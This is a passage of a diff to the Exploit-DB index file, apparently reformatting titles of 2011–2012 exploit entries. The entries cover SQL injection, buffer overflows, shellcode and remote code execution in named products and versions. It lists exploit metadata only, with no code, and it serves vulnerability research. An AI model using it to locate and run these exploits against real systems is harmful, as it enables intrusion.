-17709,platforms/php/webapps/17709.txt,"Bonza Digital Cart Script SQL Injection",2011-08-22,"Eyup CELIK",php,webapps,0 +17709,platforms/php/webapps/17709.txt,"Bonza Digital Cart Script - SQL Injection",2011-08-22,"Eyup CELIK",php,webapps,0 17710,platforms/php/webapps/17710.txt,"DV Cart Shopping Cart software SQL Injection",2011-08-22,"Eyup CELIK",php,webapps,0 17711,platforms/asp/webapps/17711.txt,"Redlab CMS - Multiple SQL Injection",2011-08-22,tempe_mendoan,asp,webapps,0 17712,platforms/windows/dos/17712.txt,"Adobe Photoshop CS5 - .GIF Remote Code Execution",2011-08-22,"Francis Provencher",windows,dos,0 @@ -15440,7 +15440,7 @@ id,file,description,date,author,platform,type,port 17773,platforms/php/webapps/17773.txt,"WordPress Facebook Opengraph Meta Plugin plugin 1.0 - SQL Injection",2011-09-03,"Miroslav Stampar",php,webapps,0 17774,platforms/php/webapps/17774.txt,"openads-2.0.11 - Remote File Inclusion",2011-09-03,"HaCkErS eV!L",php,webapps,0 17787,platforms/linux/local/17787.c,"Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation Exploit (2)",2011-09-05,"Jon Oberheide",linux,local,0 -17777,platforms/windows/local/17777.rb,"Apple QuickTime PICT PnSize Buffer Overflow",2011-09-03,Metasploit,windows,local,0 +17777,platforms/windows/local/17777.rb,"Apple QuickTime - PICT PnSize Buffer Overflow",2011-09-03,Metasploit,windows,local,0 17778,platforms/php/webapps/17778.txt,"WordPress Zotpress plugin 4.4 - SQL Injection",2011-09-04,"Miroslav Stampar",php,webapps,0 17779,platforms/php/webapps/17779.txt,"WordPress oQey Gallery plugin 0.4.8 - SQL Injection",2011-09-05,"Miroslav Stampar",php,webapps,0 17780,platforms/windows/local/17780.py,"CoolPlayer Portable 2.19.2 - Buffer Overflow (ASLR Bypass)",2011-09-05,blake,windows,local,0 @@ -15478,7 +15478,7 @@ id,file,description,date,author,platform,type,port 17817,platforms/windows/local/17817.php,"ScadaTEC ModbusTagServer & ScadaPhone - (.zip) Buffer Overflow Exploit (0Day)",2011-09-12,mr_me,windows,local,0 17818,platforms/php/webapps/17818.txt,"TomatoCart 1.1 Post Auth Local File Inclusion",2011-09-12,brain[pillow],php,webapps,0 17819,platforms/windows/remote/17819.py,"KnFTP Server - Buffer Overflow Exploit",2011-09-12,blake,windows,remote,0 -17820,platforms/windows/local/17820.c,"Aika 0.2 colladaconverter Xml Parsing Buffer Overflow",2011-09-12,isciurus,windows,local,0 +17820,platforms/windows/local/17820.c,"Aika 0.2 - colladaconverter Xml Parsing Buffer Overflow",2011-09-12,isciurus,windows,local,0 17821,platforms/windows/local/17821.py,"Wav Player 1.1.3.6 - (.pll) Buffer Overflow Exploit",2011-09-12,"Iván García Ferreira",windows,local,0 17822,platforms/php/webapps/17822.txt,"PHP Support Tickets 2.2 - Code Execution",2011-09-12,brain[pillow],php,webapps,0 17823,platforms/php/webapps/17823.txt,"NetCat CMS - Multiple Vulnerabilities",2011-09-12,brain[pillow],php,webapps,0 @@ -15505,7 +15505,7 @@ id,file,description,date,author,platform,type,port 17846,platforms/jsp/webapps/17846.php,"Nortel Contact Recording Centralized Archive 6.5.1 - SQL Injection Exploit",2011-09-15,rgod,jsp,webapps,0 17847,platforms/windows/local/17847.py,"Mini-Stream Ripper 2.9.7 - DEP Bypass",2011-09-16,blake,windows,local,0 17848,platforms/windows/remote/17848.rb,"Measuresoft ScadaPro 4.0.0 - Remote Command Execution",2011-09-16,Metasploit,windows,remote,0 -17849,platforms/windows/remote/17849.rb,"RealNetworks Realplayer QCP Parsing Heap Overflow",2011-09-17,Metasploit,windows,remote,0 +17849,platforms/windows/remote/17849.rb,"RealNetworks Realplayer - QCP Parsing Heap Overflow",2011-09-17,Metasploit,windows,remote,0 17850,platforms/php/webapps/17850.txt,"iBrowser Plugin 1.4.1 (lang) - Local File Inclusion",2011-09-17,LiquidWorm,php,webapps,0 17851,platforms/php/webapps/17851.txt,"iManager Plugin 1.2.8 (lang) - Local File Inclusion",2011-09-17,LiquidWorm,php,webapps,0 17852,platforms/php/webapps/17852.txt,"iManager Plugin 1.2.8 (d) - Remote Arbitrary File Deletion",2011-09-17,LiquidWorm,php,webapps,0 @@ -15566,7 +15566,7 @@ id,file,description,date,author,platform,type,port 17919,platforms/php/webapps/17919.txt,"Banana Dance CMS and Wiki - SQL Injection",2011-10-02,Aodrulez,php,webapps,0 17920,platforms/php/webapps/17920.txt,"Vivvo CMS - Local File Inclusion",2011-10-02,JaBrOtxHaCkEr,php,webapps,0 17921,platforms/asp/webapps/17921.txt,"GotoCode Online Bookstore - Multiple Vulnerabilities",2011-10-03,"Nathaniel Carew",asp,webapps,0 -17922,platforms/cgi/webapps/17922.rb,"CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection",2011-10-02,Metasploit,cgi,webapps,0 +17922,platforms/cgi/webapps/17922.rb,"CA Total Defense Suite - reGenerateReports Stored Procedure SQL Injection",2011-10-02,Metasploit,cgi,webapps,0 17924,platforms/jsp/webapps/17924.pl,"JBoss & JMX Console & Misconfigured Deployment Scanner",2011-10-03,y0ug,jsp,webapps,0 17925,platforms/php/webapps/17925.txt,"Concrete5 <= 5.4.2.1 - Multiple Vulnerabilities",2011-10-04,"Ryan Dewhurst",php,webapps,0 17926,platforms/php/webapps/17926.txt,"Easy Hosting Control Panel Admin Auth Bypass",2011-10-04,Jasman,php,webapps,0 @@ -15589,9 +15589,9 @@ id,file,description,date,author,platform,type,port 17943,platforms/php/webapps/17943.txt,"BOOKSolved 1.2.2 - Remote File Disclosure",2011-10-08,bd0rk,php,webapps,0 17944,platforms/php/webapps/17944.txt,"Joomla Component Time Returns (com_timereturns) 2.0 - SQL Injection",2011-10-08,kaMtiEz,php,webapps,0 17946,platforms/php/webapps/17946.txt,"NexusPHP 1.5 - SQL Injection",2011-10-08,flyh4t,php,webapps,0 -17947,platforms/php/webapps/17947.rb,"Snortreport nmap.php and nbtscan.php Remote Command Execution",2011-10-09,Metasploit,php,webapps,0 +17947,platforms/php/webapps/17947.rb,"Snortreport - nmap.php and nbtscan.php Remote Command Execution",2011-10-09,Metasploit,php,webapps,0 17948,platforms/windows/remote/17948.rb,"ScriptFTP 3.3 - Remote Buffer Overflow (LIST) (2)",2011-10-09,Metasploit,windows,remote,0 -17949,platforms/php/webapps/17949.rb,"myBB 1.6.4 Backdoor Exploit",2011-10-09,Metasploit,php,webapps,0 +17949,platforms/php/webapps/17949.rb,"myBB 1.6.4 - Backdoor Exploit",2011-10-09,Metasploit,php,webapps,0 17950,platforms/php/webapps/17950.txt,"GotoCode Online Classifieds - Multiple Vulnerabilities",2011-10-09,"Nathaniel Carew",php,webapps,0 17951,platforms/php/webapps/17951.txt,"openEngine 2.0 - Multiple Blind SQL Injection vulnerabilities",2011-10-10,"Stefan Schurtz",php,webapps,0 17952,platforms/php/webapps/17952.txt,"KaiBB 2.0.1 - SQL Injection",2011-10-10,"Stefan Schurtz",php,webapps,0 @@ -15611,7 +15611,7 @@ id,file,description,date,author,platform,type,port 17964,platforms/windows/dos/17964.txt,"IRAI AUTOMGEN 8.0.0.7 - Use-After-Free",2011-10-10,"Luigi Auriemma",windows,dos,0 17965,platforms/windows/dos/17965.txt,"OPC Systems.NET 4.00.0048 - Denial of Service",2011-10-10,"Luigi Auriemma",windows,dos,0 17966,platforms/windows/local/17966.rb,"ACDSee FotoSlate - .PLP File id Parameter Overflow",2011-10-10,Metasploit,windows,local,0 -17967,platforms/windows/local/17967.rb,"TugZip 3.5 Zip File Parsing Buffer Overflow",2011-10-11,Metasploit,windows,local,0 +17967,platforms/windows/local/17967.rb,"TugZip 3.5 - Zip File Parsing Buffer Overflow",2011-10-11,Metasploit,windows,local,0 17974,platforms/windows/remote/17974.html,"Mozilla Firefox - Array.reduceRight() Integer Overflow Exploit",2011-10-12,ryujin,windows,remote,0 17975,platforms/windows/remote/17975.rb,"PcVue 10.0 SV.UIGrdCtrl.1 - 'LoadObject()/SaveObject()' Trusted DWORD",2011-10-12,Metasploit,windows,remote,0 17976,platforms/windows/remote/17976.rb,"Mozilla Firefox - Array.reduceRight() Integer Overflow",2011-10-13,Metasploit,windows,remote,0 @@ -15619,13 +15619,13 @@ id,file,description,date,author,platform,type,port 17978,platforms/windows/dos/17978.txt,"Windows - .fon Kernel-Mode Buffer Overrun PoC (MS11-077)",2011-10-13,"Byoungyoung Lee",windows,dos,0 17980,platforms/php/webapps/17980.txt,"WordPress Contact Form plugin 2.7.5 - SQL Injection",2011-10-14,Skraps,php,webapps,0 17981,platforms/windows/dos/17981.py,"Windows - TCP/IP Stack Denial of Service (MS11-064)",2011-10-15,"Byoungyoung Lee",windows,dos,0 -17982,platforms/windows/dos/17982.pl,"BlueZone Desktop .zap file Local Denial of Service",2011-10-15,Silent_Dream,windows,dos,0 +17982,platforms/windows/dos/17982.pl,"BlueZone Desktop - .zap file Local Denial of Service",2011-10-15,Silent_Dream,windows,dos,0 17983,platforms/php/webapps/17983.txt,"WordPress Plugin Photo Album Plus 4.1.1 - SQL Injection",2011-10-15,Skraps,php,webapps,0 17985,platforms/windows/local/17985.rb,"Real Networks Netzip Classic 7.5.1 86 - File Parsing Buffer Overflow",2011-10-16,Metasploit,windows,local,0 17984,platforms/php/webapps/17984.txt,"Ruubikcms 1.1.0 - (/extra/image.php) Local File Inclusion",2011-10-16,"Sangyun YOO",php,webapps,0 -17986,platforms/osx/remote/17986.rb,"Apple Safari file:// Arbitrary Code Execution",2011-10-17,Metasploit,osx,remote,0 +17986,platforms/osx/remote/17986.rb,"Apple Safari - file:// Arbitrary Code Execution",2011-10-17,Metasploit,osx,remote,0 17987,platforms/php/webapps/17987.txt,"WordPress BackWPUp Plugin 2.1.4 - Code Execution",2011-10-17,"Sense of Security",php,webapps,0 -17993,platforms/windows/remote/17993.rb,"Apple Safari Webkit libxslt Arbitrary File Creation",2011-10-18,Metasploit,windows,remote,0 +17993,platforms/windows/remote/17993.rb,"Apple Safari Webkit - libxslt Arbitrary File Creation",2011-10-18,Metasploit,windows,remote,0 17994,platforms/php/webapps/17994.php,"Dolphin 7.0.7 - (member_menu_queries.php) Remote PHP Code Injection",2011-10-18,EgiX,php,webapps,0 17989,platforms/php/webapps/17989.txt,"Dominant Creature BBG/RPG Browser Game Persistent XSS",2011-10-17,M.Jock3R,php,webapps,0 17992,platforms/php/webapps/17992.txt,"Gnuboard 4.33.02 tp.php PATH_INFO SQL Injection",2011-10-17,flyh4t,php,webapps,0 @@ -15638,7 +15638,7 @@ id,file,description,date,author,platform,type,port 18001,platforms/php/webapps/18001.txt,"CMSmini 0.2.2 - Local File Inclusion",2011-10-20,BeopSeong/I2Sec,php,webapps,0 18002,platforms/php/webapps/18002.txt,"Uiga Personal Portal - Multiple Vulnerabilities",2011-10-20,"Eyup CELIK",php,webapps,0 18003,platforms/php/webapps/18003.txt,"fims File Management System 1.2.1a - Multiple Vulnerabilities",2011-10-20,Skraps,php,webapps,0 -18004,platforms/php/webapps/18004.txt,"Simple Free PHP Forum Script SQL Injection",2011-10-20,Skraps,php,webapps,0 +18004,platforms/php/webapps/18004.txt,"Simple Free PHP Forum Script - SQL Injection",2011-10-20,Skraps,php,webapps,0 18005,platforms/windows/webapps/18005.txt,"OCS Inventory NG 2.0.1 - Persistent XSS",2011-10-20,"Nicolas DEROUET",windows,webapps,0 18006,platforms/windows/dos/18006.html,"Opera 11.52 PoC Denial of Service",2011-10-20,pigtail23,windows,dos,0 18007,platforms/windows/dos/18007.txt,"Oracle DataDirect Multiple Native Wire Protocol ODBC Drivers HOST Attribute Stack Based Buffer Overflow",2011-10-20,rgod,windows,dos,0 @@ -15666,13 +15666,13 @@ id,file,description,date,author,platform,type,port 18040,platforms/linux/local/18040.c,"Xorg 1.4 < 1.11.2 - File Permission Change PoC",2011-10-28,vladz,linux,local,0 18027,platforms/windows/local/18027.rb,"Cytel Studio 9.0 - (.CY3) Stack Buffer Overflow",2011-10-24,Metasploit,windows,local,0 18028,platforms/windows/dos/18028.py,"zFTP Server - 'cwd/stat' Remote Denial-of-Service",2011-10-24,"Myo Soe",windows,dos,0 -18029,platforms/windows/dos/18029.pl,"BlueZone Malformed .zft file Local Denial of Service",2011-10-24,"Iolo Morganwg",windows,dos,0 -18030,platforms/windows/dos/18030.pl,"BlueZone Desktop Multiple Malformed files Local Denial of Service Vulnerabilities",2011-10-25,Silent_Dream,windows,dos,0 +18029,platforms/windows/dos/18029.pl,"BlueZone - Malformed .zft file Local Denial of Service",2011-10-24,"Iolo Morganwg",windows,dos,0 +18030,platforms/windows/dos/18030.pl,"BlueZone Desktop Multiple - Malformed files Local Denial of Service Vulnerabilities",2011-10-25,Silent_Dream,windows,dos,0 18031,platforms/php/webapps/18031.rb,"phpLDAPadmin 1.2.1.1 - (query_engine) Remote PHP Code Injection",2011-10-25,Metasploit,php,webapps,0 18032,platforms/windows/webapps/18032.rb,"SAP Management Console OSExecute Payload Execution",2011-10-24,Metasploit,windows,webapps,0 18035,platforms/php/webapps/18035.txt,"Online Subtitles Workshop XSS",2011-10-26,M.Jock3R,php,webapps,0 18036,platforms/php/webapps/18036.txt,"eFront 3.6.10 - (build 11944) Multiple Security Vulnerabilities",2011-10-27,EgiX,php,webapps,0 -18037,platforms/php/webapps/18037.rb,"phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Code Injection",2011-10-26,Metasploit,php,webapps,0 +18037,platforms/php/webapps/18037.rb,"phpScheduleIt PHP - reserve.php start_date Parameter Arbitrary Code Injection",2011-10-26,Metasploit,php,webapps,0 18038,platforms/windows/local/18038.rb,"GTA SA-MP server.cfg - Buffer Overflow",2011-10-26,Metasploit,windows,local,0 18039,platforms/php/webapps/18039.txt,"WordPress wptouch plugin - SQL Injection",2011-10-27,longrifle0x,php,webapps,0 18045,platforms/php/webapps/18045.txt,"PHP Photo Album 0.4.1.16 - Multiple Disclosure Vulnerabilities",2011-10-29,"BHG Security Center",php,webapps,0 @@ -15681,7 +15681,7 @@ id,file,description,date,author,platform,type,port 18049,platforms/windows/dos/18049.txt,"Microsys PROMOTIC 8.1.4 - ActiveX GetPromoticSite Unitialized Pointer",2011-10-13,"Luigi Auriemma",windows,dos,0 18050,platforms/php/webapps/18050.txt,"Joomla HM-Community - (com_hmcommunity) Multiple Vulnerabilities",2011-10-31,"599eme Man",php,webapps,0 18051,platforms/windows/remote/18051.txt,"BroadWin WebAccess SCADA/HMI Client Remote Code Execution",2011-10-31,Snake,windows,remote,0 -18052,platforms/windows/dos/18052.php,"Oracle DataDirect ODBC Drivers HOST Attribute arsqls24.dll Stack Based Buffer Overflow PoC",2011-10-31,rgod,windows,dos,0 +18052,platforms/windows/dos/18052.php,"Oracle DataDirect ODBC Drivers - HOST Attribute arsqls24.dll Stack Based Buffer Overflow PoC",2011-10-31,rgod,windows,dos,0 18053,platforms/php/webapps/18053.txt,"WordPress Theme classipress 3.1.4 - Stored XSS",2011-10-31,"Paul Loftness",php,webapps,0 18055,platforms/php/webapps/18055.txt,"WordPress Plugin Glossary - SQL Injection",2011-10-31,longrifle0x,php,webapps,0 18056,platforms/php/webapps/18056.txt,"jbShop - e107 7 CMS Plugin - SQL Injection",2011-10-31,"Robert Cooper",php,webapps,0 @@ -15710,13 +15710,13 @@ id,file,description,date,author,platform,type,port 18084,platforms/php/webapps/18084.php,"phpMyFAQ 2.7.0 - (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0 18085,platforms/php/webapps/18085.php,"aidiCMS 3.55 - (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0 18086,platforms/linux/local/18086.c,"Calibre E-Book Reader - Local Root",2011-11-05,zx2c4,linux,local,0 -18087,platforms/windows/local/18087.rb,"Microsoft Office 2007 Excel .xlb Buffer Overflow (MS11-021)",2011-11-05,Metasploit,windows,local,0 +18087,platforms/windows/local/18087.rb,"Microsoft Office 2007 Excel - .xlb Buffer Overflow (MS11-021)",2011-11-05,Metasploit,windows,local,0 18088,platforms/php/webapps/18088.txt,"WHMCompleteSolution 3.x/4.x - Multiple Vulnerabilities",2011-11-07,ZxH-Labs,php,webapps,0 18089,platforms/windows/remote/18089.rb,"KnFTP 1.0 - Buffer Overflow Exploit (DEP Bypass) (Metasploit)",2011-11-07,pasta,windows,remote,0 18090,platforms/php/webapps/18090.txt,"LabStoRe 1.5.4 - SQL Injection",2011-11-07,muuratsalo,php,webapps,0 18091,platforms/php/webapps/18091.txt,"OrderSys 1.6.4 - SQL Injection",2011-11-07,muuratsalo,php,webapps,0 18092,platforms/windows/remote/18092.html,"Oracle Hyperion Strategic Finance 12.x - Tidestone Formula One WorkBook OLE Control TTF16.ocx Remote Heap Overflow",2011-11-07,rgod,windows,remote,0 -18093,platforms/windows/remote/18093.txt,"Oracle XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA Procedure Exploit",2011-11-07,"David Maman",windows,remote,0 +18093,platforms/windows/remote/18093.txt,"Oracle - XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA Procedure Exploit",2011-11-07,"David Maman",windows,remote,0 18095,platforms/php/webapps/18095.txt,"11in1 CMS 1.0.1 - (do.php) CRLF Injection",2011-11-08,LiquidWorm,php,webapps,0 18096,platforms/windows/local/18096.py,"Aviosoft Digital TV Player Professional 1.x - Stack Buffer Overflow",2011-11-09,modpr0be,windows,local,0 18099,platforms/php/webapps/18099.txt,"osCSS2 - '_ID' parameter Local file inclusion",2011-11-09,"Stefan Schurtz",php,webapps,0 @@ -15744,35 +15744,35 @@ id,file,description,date,author,platform,type,port 18122,platforms/hardware/webapps/18122.txt,"SonicWALL Aventail SSL-VPN SQL Injection",2011-11-16,"Asheesh kumar",hardware,webapps,0 18123,platforms/windows/remote/18123.rb,"Viscom Image Viewer CP Pro 8.0/Gold 6.0 - ActiveX Control",2011-11-17,Metasploit,windows,remote,0 18124,platforms/windows/dos/18124.py,"Thunder Kankan Player 4.8.3.840 - Stack Overflow/DOS Exploit",2011-11-18,hellok,windows,dos,0 -18125,platforms/windows/remote/18125.rb,"Wireshark console.lua pre-loading",2011-11-19,Metasploit,windows,remote,0 +18125,platforms/windows/remote/18125.rb,"Wireshark - console.lua pre-loading",2011-11-19,Metasploit,windows,remote,0 18126,platforms/php/webapps/18126.txt,"WordPress jetpack Plugin - 'sharedaddy.php' ID SQL Injection",2011-11-19,longrifle0x,php,webapps,0 18127,platforms/php/webapps/18127.txt,"Freelancer calendar 1.01 - SQL Injection",2011-11-19,muuratsalo,php,webapps,0 18128,platforms/php/webapps/18128.txt,"Valid tiny-erp 1.6 - SQL Injection",2011-11-19,muuratsalo,php,webapps,0 18129,platforms/php/webapps/18129.txt,"Blogs manager 1.101 - SQL Injection",2011-11-19,muuratsalo,php,webapps,0 18131,platforms/php/webapps/18131.txt,"ARASTAR - SQL Injection",2011-11-19,TH3_N3RD,php,webapps,0 -18134,platforms/windows/remote/18134.rb,"Viscom Software Movie Player Pro SDK ActiveX 6.8",2011-11-20,Metasploit,windows,remote,0 +18134,platforms/windows/remote/18134.rb,"Viscom Software Movie Player Pro SDK ActiveX 6.8 - Exploit",2011-11-20,Metasploit,windows,remote,0 18137,platforms/win_x86/local/18137.rb,"QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows DEP_ASLR BYPASS (Metasploit)",2011-11-21,hellok,win_x86,local,0 18138,platforms/windows/remote/18138.txt,"VMware - Update Manager Directory Traversal",2011-11-21,"Alexey Sintsov",windows,remote,0 18140,platforms/windows/dos/18140.c,"Winows 7 keylayout - Blue Screen",2011-11-21,instruder,windows,dos,0 18142,platforms/windows/local/18142.rb,"Free MP3 CD Ripper 1.1 - (.WAV) Stack Buffer Overflow",2011-11-22,Metasploit,windows,local,0 -18143,platforms/windows/local/18143.rb,"Microsoft Office Excel Malformed OBJ Record Handling Overflow (MS11-038)",2011-11-22,Metasploit,windows,local,0 +18143,platforms/windows/local/18143.rb,"Microsoft Office Excel - Malformed OBJ Record Handling Overflow (MS11-038)",2011-11-22,Metasploit,windows,local,0 18145,platforms/linux/remote/18145.py,"Wireshark 1.4.4 - DECT Dissector Remote Buffer Overflow",2011-11-22,ipv,linux,remote,0 18147,platforms/linux/local/18147.c,"bzexe (bzip2) - race condition",2011-11-23,vladz,linux,local,0 -18148,platforms/php/webapps/18148.pl,"PHP-Nuke 8.1.0.3.5b (Downloads) Remote Blind SQL Injection",2011-11-23,Dante90,php,webapps,0 +18148,platforms/php/webapps/18148.pl,"PHP-Nuke 8.1.0.3.5b - (Downloads) Remote Blind SQL Injection",2011-11-23,Dante90,php,webapps,0 18149,platforms/php/webapps/18149.php,"PmWiki 2.2.34 - (pagelist) Remote PHP Code Injection Exploit (1)",2011-11-23,EgiX,php,webapps,0 18151,platforms/php/webapps/18151.php,"Log1CMS 2.0 - (ajax_create_folder.php) Remote Code Execution",2011-11-24,"Adel SBM",php,webapps,0 18153,platforms/cgi/webapps/18153.txt,"LibLime Koha 4.2 - Local File Inclusion",2011-11-24,"Akin Tosunlar",cgi,webapps,0 18154,platforms/sh4/shellcode/18154.c,"Linux/SuperH (sh4) - setuid(0) ; execve(_/bin/sh__ NULL_ NULL) shellcode (27 bytes)",2011-11-24,"Jonathan Salwan",sh4,shellcode,0 18155,platforms/php/webapps/18155.txt,"Zabbix 1.8.4 - (popup.php) SQL Injection",2011-11-24,"Marcio Almeida",php,webapps,0 -18156,platforms/php/webapps/18156.txt,"php video script SQL Injection",2011-11-25,longrifle0x,php,webapps,0 +18156,platforms/php/webapps/18156.txt,"php video script - SQL Injection",2011-11-25,longrifle0x,php,webapps,0 18159,platforms/linux/dos/18159.py,"XChat Heap Overflow DoS",2011-11-25,"Jane Doe",linux,dos,0 18162,platforms/linux_mips/shellcode/18162.c,"Linux/MIPS - execve /bin/sh shellcode (48 bytes)",2011-11-27,rigan,linux_mips,shellcode,0 18163,platforms/linux_mips/shellcode/18163.c,"Linux/MIPS - Add user(UID 0) 'rOOt' with password 'pwn3d' shellcode (164 bytes)",2011-11-27,rigan,linux_mips,shellcode,0 19400,platforms/php/webapps/19400.txt,"WordPress Website FAQ Plugin 1.0 - SQL Injection",2012-06-26,"Chris Kellum",php,webapps,0 18165,platforms/windows/dos/18165.txt,"siemens automation license manager 500.0.122.1 - Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0 18166,platforms/windows/dos/18166.txt,"Siemens SIMATIC WinCC Flexible (Runtime) - Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0 -18167,platforms/php/webapps/18167.zip,"Bypass the JQuery-Real-Person captcha plugin (0Day)",2011-11-28,Alberto_García_Illera,php,webapps,0 -18171,platforms/multiple/remote/18171.rb,"Java Applet Rhino Script Engine Remote Code Execution",2011-11-30,Metasploit,multiple,remote,0 +18167,platforms/php/webapps/18167.zip,"JQuery-Real-Person plugin - Bypass captcha (0Day)",2011-11-28,Alberto_García_Illera,php,webapps,0 +18171,platforms/multiple/remote/18171.rb,"Java Applet Rhino Script Engine - Remote Code Execution",2011-11-30,Metasploit,multiple,remote,0 18172,platforms/hardware/remote/18172.rb,"CTEK SkyRouter 4200 / 4300 - Command Execution",2011-11-30,Metasploit,hardware,remote,0 18173,platforms/windows/dos/18173.pl,"Bugbear FlatOut 2005 - Malformed .bed file Buffer Overflow",2011-11-30,Silent_Dream,windows,dos,0 18174,platforms/windows/local/18174.py,"GOM Player 2.1.33.5071 ASX File Unicode Stack Buffer Overflow Exploit",2011-11-30,"Debasish Mandal",windows,local,0 @@ -15784,7 +15784,7 @@ id,file,description,date,author,platform,type,port 18182,platforms/windows/remote/18182.txt,"Serv-U FTP Jail Break",2011-12-01,kingcope,windows,remote,0 18183,platforms/windows/remote/18183.rb,"AVID Media Composer Phonetic Indexer Remote Stack BoF (Metasploit)",2011-12-01,"Nick Freeman",windows,remote,0 18184,platforms/windows/local/18184.rb,"Final Draft 8 - Multiple Stack Buffer Overflows (Metasploit)",2011-12-01,"Nick Freeman",windows,local,0 -18185,platforms/php/webapps/18185.txt,"Muster Render Farm Management System Arbitrary File Download",2011-12-01,"Nick Freeman",php,webapps,0 +18185,platforms/php/webapps/18185.txt,"Muster Render Farm Management System - Arbitrary File Download",2011-12-01,"Nick Freeman",php,webapps,0 18186,platforms/windows/local/18186.rb,"StoryBoard Quick 6 - Stack Buffer Overflow (Metasploit)",2011-12-01,"Nick Freeman",windows,local,0 18187,platforms/windows/remote/18187.c,"CoDeSys SCADA 2.3 - Remote Exploit",2011-12-01,"Celil Ünüver",windows,remote,0 18188,platforms/windows/dos/18188.txt,"Hillstone Software HS TFTP Server 1.3.2 - Denial of Service",2011-12-02,"SecPod Research",windows,dos,0 @@ -15801,16 +15801,16 @@ id,file,description,date,author,platform,type,port 18201,platforms/windows/local/18201.txt,"SopCast 3.4.7 - (Diagnose.exe) Improper Permissions",2011-12-05,LiquidWorm,windows,local,0 18202,platforms/php/webapps/18202.txt,"Meditate Web Content Editor 'username_input' - SQL Injection",2011-12-05,"Stefan Schurtz",php,webapps,0 18207,platforms/php/webapps/18207.txt,"AlstraSoft EPay Enterprise 4.0 - Blind SQL Injection",2011-12-06,Don,php,webapps,0 -18208,platforms/php/webapps/18208.rb,"Family Connections less.php Remote Command Execution",2011-12-07,Metasploit,php,webapps,0 +18208,platforms/php/webapps/18208.rb,"Family Connections - less.php Remote Command Execution",2011-12-07,Metasploit,php,webapps,0 18215,platforms/php/webapps/18215.txt,"SourceBans 1.4.8 - SQL/LFI Injection",2011-12-07,Havok,php,webapps,0 18217,platforms/php/webapps/18217.txt,"SantriaCMS - SQL Injection",2011-12-08,Troy,php,webapps,0 18218,platforms/php/webapps/18218.txt,"QContacts 1.0.6 - (Joomla component) SQL injection",2011-12-08,Don,php,webapps,0 -18210,platforms/php/webapps/18210.txt,"Php City Portal Script Software SQL Injection",2011-12-07,Don,php,webapps,0 +18210,platforms/php/webapps/18210.txt,"Php City Portal Script Software - SQL Injection",2011-12-07,Don,php,webapps,0 18212,platforms/php/webapps/18212.txt,"phpBB MyPage Plugin SQL Injection",2011-12-07,CrazyMouse,php,webapps,0 18213,platforms/php/webapps/18213.php,"Traq 2.3 - Authentication Bypass / Remote Code Execution Exploit",2011-12-07,EgiX,php,webapps,0 18214,platforms/php/webapps/18214.py,"SMF 2.0.1 - SQL Injection / Privilege Escalation",2011-12-07,The:Paradox,php,webapps,0 18220,platforms/windows/dos/18220.py,"CyberLink Multiple Products - File Project Handling Stack Buffer Overflow PoC",2011-12-09,modpr0be,windows,dos,0 -18221,platforms/linux/dos/18221.c,"Apache HTTP Server Denial of Service",2011-12-09,"Ramon de C Valle",linux,dos,0 +18221,platforms/linux/dos/18221.c,"Apache HTTP Server - Denial of Service",2011-12-09,"Ramon de C Valle",linux,dos,0 18222,platforms/php/webapps/18222.txt,"SePortal 2.5 - SQL Injection",2011-12-09,Don,php,webapps,0 18223,platforms/windows/dos/18223.pl,"Free Opener Local Denial of Service",2011-12-09,"Iolo Morganwg",windows,dos,0 18224,platforms/php/webapps/18224.php,"Docebo Lms 4.0.4 - (messages) Remote Code Execution",2011-12-09,mr_me,php,webapps,0 @@ -15851,7 +15851,7 @@ id,file,description,date,author,platform,type,port 18274,platforms/php/webapps/18274.txt,"openemr 4 - Multiple Vulnerabilities",2011-12-25,Level,php,webapps,0 18275,platforms/win_x86-64/dos/18275.txt,"GdiDrawStream BSoD using Safari",2011-12-18,webDEViL,win_x86-64,dos,0 18276,platforms/php/webapps/18276.txt,"WordPress Mailing List Plugin - Arbitrary File Download",2011-12-26,6Scan,php,webapps,0 -18277,platforms/php/webapps/18277.txt,"Free Image Hosting Script Arbitrary File Upload",2011-12-26,ySecurity,php,webapps,0 +18277,platforms/php/webapps/18277.txt,"Free Image Hosting Script - Arbitrary File Upload",2011-12-26,ySecurity,php,webapps,0 18278,platforms/linux/dos/18278.txt,"Nagios Plugin check_ups Local Buffer Overflow PoC",2011-12-26,"Stefan Schurtz",linux,dos,0 18280,platforms/linux/remote/18280.c,"Telnetd encrypt_keyid - Remote Root Function Pointer Overwrite",2011-12-26,"NighterMan and BatchDrake",linux,remote,0 18283,platforms/windows/remote/18283.rb,"CoCSoft Stream Down 6.8.0 - Universal Exploit (Metasploit)",2011-12-27,"Fady Mohammed Osman",windows,remote,0 @@ -15896,7 +15896,7 @@ id,file,description,date,author,platform,type,port 18337,platforms/windows/dos/18337.pl,"M-Player 0.4 - Local Denial of Service",2012-01-08,JaMbA,windows,dos,0 18338,platforms/php/webapps/18338.txt,"phpMyDirectory.com 1.3.3 - SQL Injection",2012-01-08,Serseri,php,webapps,0 18339,platforms/windows/dos/18339.py,"GPSMapEdit 1.1.73.2 - (.lst) Local Denial of Service",2012-01-09,"Julien Ahrens",windows,dos,0 -18340,platforms/php/webapps/18340.txt,"Paddelberg Topsite Script Authentication Bypass",2012-01-09,"Christian Inci",php,webapps,0 +18340,platforms/php/webapps/18340.txt,"Paddelberg Topsite Script - Authentication Bypass",2012-01-09,"Christian Inci",php,webapps,0 18341,platforms/php/webapps/18341.txt,"clip bucket 2.6 - Multiple Vulnerabilities",2012-01-09,YaDoY666,php,webapps,0 18342,platforms/php/webapps/18342.txt,"SAPID 1.2.3 Stable Remote File Inclusion",2012-01-09,"Opa Yong",php,webapps,0 18343,platforms/linux/webapps/18343.pl,"Enigma2 Webinterface 1.7.x 1.6.x 1.5.x - (linux) Remote File Disclosure",2012-01-09,"Todor Donev",linux,webapps,0 @@ -15906,8 +15906,8 @@ id,file,description,date,author,platform,type,port 18348,platforms/php/webapps/18348.txt,"w-cms 2.01 - Multiple 